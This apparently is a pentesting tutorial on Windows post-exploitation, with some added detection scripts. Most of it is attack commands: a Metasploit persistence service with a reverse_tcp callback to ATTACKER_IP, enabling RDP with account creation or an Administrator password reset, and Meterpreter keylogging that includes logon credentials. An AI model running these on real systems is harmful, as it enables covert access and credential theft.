
Establishing Persistence On Windows

Persistence techniques are the methods attackers use to keep access to a compromised system across restarts, credential changes and other interruptions that would otherwise cut off their access.

Metasploit modules

exploit/windows/local/persistence_service

use exploit/windows/local/persistence_service

set payload windows/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

set LPORT ATTACKER_PORT

set SESSION SESSION_ID

run

The module installs a new Windows service that starts at boot and connects back to the attacker. Once it is in place, the multi/handler module is used to catch that callback and re-establish the session with the target system, for example after a reboot.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

set LPORT ATTACKER_PORT

run

The payload, LHOST and LPORT must be identical in the persistence module and in the handler; otherwise the service's callback never reaches the listener.
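The flip side of the procedure above is checking a host for the artefacts it leaves. The following PowerShell is an added example (not from the original notes or from Metasploit): it lists services whose executable lives outside the Windows and Program Files trees, which is where a dropped persistence binary usually ends up, and correlates them with service-installation events. Thresholds and the trusted-directory list are assumptions of this example.

```powershell
# Added example: hunt for service-based persistence of the kind that
# exploit/windows/local/persistence_service leaves behind. The module registers
# a new service whose executable is dropped into a writable directory such as
# %TEMP%; legitimate services almost never run from there. Run as administrator.

# Directories a trusted service binary is expected to live under (assumption).
$trustedRoots = @(
    $env:SystemRoot,
    ${env:ProgramFiles},
    ${env:ProgramFiles(x86)}
) | Where-Object { $_ }

function Get-SuspiciousService {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }
        # Strip surrounding quotes and arguments to isolate the executable path.
        $exe = if ($path.StartsWith('"')) { $path.Split('"')[1] } else { $path.Split(' ')[0] }
        $trusted = $false
        foreach ($root in $trustedRoots) {
            if ($exe.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $trusted = $true
                break
            }
        }
        if (-not $trusted) {
            [pscustomobject]@{
                Name      = $_.Name
                State     = $_.State
                StartMode = $_.StartMode
                Account   = $_.StartName
                Binary    = $exe
            }
        }
    }
}

Get-SuspiciousService | Format-Table -AutoSize

# Newly installed services are also recorded in the System log as event ID 7045
# ("A service was installed in the system"); properties 0 and 1 are the service
# name and its image path. Correlate this view with the one above.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-7) } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated,
        @{ n = 'Service';   e = { $_.Properties[0].Value } },
        @{ n = 'ImagePath'; e = { $_.Properties[1].Value } } |
    Format-Table -AutoSize
```

A hit on both lists (a service running from a temp directory that was installed in the last few days) is a strong signal; a service outside the trusted roots alone is common for third-party software and needs a second look at the binary's signature and publisher.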

Enabling RDP

RDP uses TCP port 3389 by default.

Remote Desktop is disabled by default on Windows; however, there is a Metasploit post module that enables it on the Windows target from an existing session.

post/windows/manage/enable_rdp

use post/windows/manage/enable_rdp

set SESSION SESSION_ID

run

# Check from the attacker side that RDP is now reachable on the target
db_nmap -sV -p 3389 TARGET_IP

# Go back to the session and drop to a shell. Changing the Administrator password
# locks out the legitimate owner and is noticed immediately, so it is not recommended
# in a real engagement; prefer creating a dedicated account (see getgui below).
sessions -i SESSION_ID

shell

# Change the password for the Administrator user (lab use only)
net user Administrator NEW_PASSWORD

# Connect to RDP from the attacker machine
xfreerdp /u:administrator /p:NEW_PASSWORD /v:TARGET_IP

Automate the process with Metasploit

# From the Meterpreter session: -e enables RDP, -u/-p creates a new local user
# with that password and grants it Remote Desktop access, so the Administrator
# password is left untouched. getgui is a legacy script; the same can be done with
# post/windows/manage/enable_rdp by setting its USERNAME and PASSWORD options.
run getgui -e -u USER_NAME -p PASSWORD
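What the modules above change on the target is a single registry value, the Windows firewall rules for port 3389, the TermService service and, with -u/-p, a local account. The following PowerShell is an added example (not from the original notes or from Metasploit) that performs those steps by hand on the target, keeps a check function a defender can reuse, and lists the Security events the change produces. RDP_USER and RDP_PASS are placeholders assumed by this example; it must run in an elevated PowerShell on the target.

```powershell
# Added example: manual equivalent of enabling RDP and creating an RDP user,
# with a check that works in both directions (attacker verifying, defender auditing).

$RdpUser = 'RDP_USER'   # placeholder (assumption of this example)
$RdpPass = 'RDP_PASS'   # placeholder (assumption of this example)
$tsKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Test-RdpEnabled {
    # fDenyTSConnections = 1 means Remote Desktop is disabled (the Windows default).
    (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections -eq 0
}

"RDP enabled before: $(Test-RdpEnabled)"

# 1. Allow connections, open the built-in "Remote Desktop" firewall rules and
#    make sure the Remote Desktop Services service is running.
Set-ItemProperty -Path $tsKey -Name fDenyTSConnections -Value 0
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
Start-Service -Name TermService

# 2. Create a dedicated account and grant it RDP access instead of resetting the
#    Administrator password, which locks the real owner out and is noticed at once.
net user $RdpUser $RdpPass /add
net localgroup 'Remote Desktop Users' $RdpUser /add

"RDP enabled after:  $(Test-RdpEnabled)"
"Port 3389 listening: $((Test-NetConnection -ComputerName localhost -Port 3389).TcpTestSucceeded)"

# 3. Artefacts this leaves in the Security log, which defenders can alert on:
#    4720 (a user account was created) and 4732 (a member was added to a
#    security-enabled local group), plus the registry value above flipping to 0.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddHours(-1) } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message | Format-List
```

On a real engagement, record every value changed here so it can be reverted; the Metasploit modules write a cleanup resource script for the same reason.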

Windows Keylogging

# keyscan only captures keystrokes delivered to the desktop of the process Meterpreter
# lives in. Migrate into explorer.exe (the logged-on user's shell) to capture what the
# user types; migrating into winlogon.exe instead captures credentials typed at the
# logon screen.
pgrep explorer.exe
migrate EXPLORER_PID

# Start keylogger
keyscan_start

# Dump keystrokes
keyscan_dump

# Stop keylogger
keyscan_stop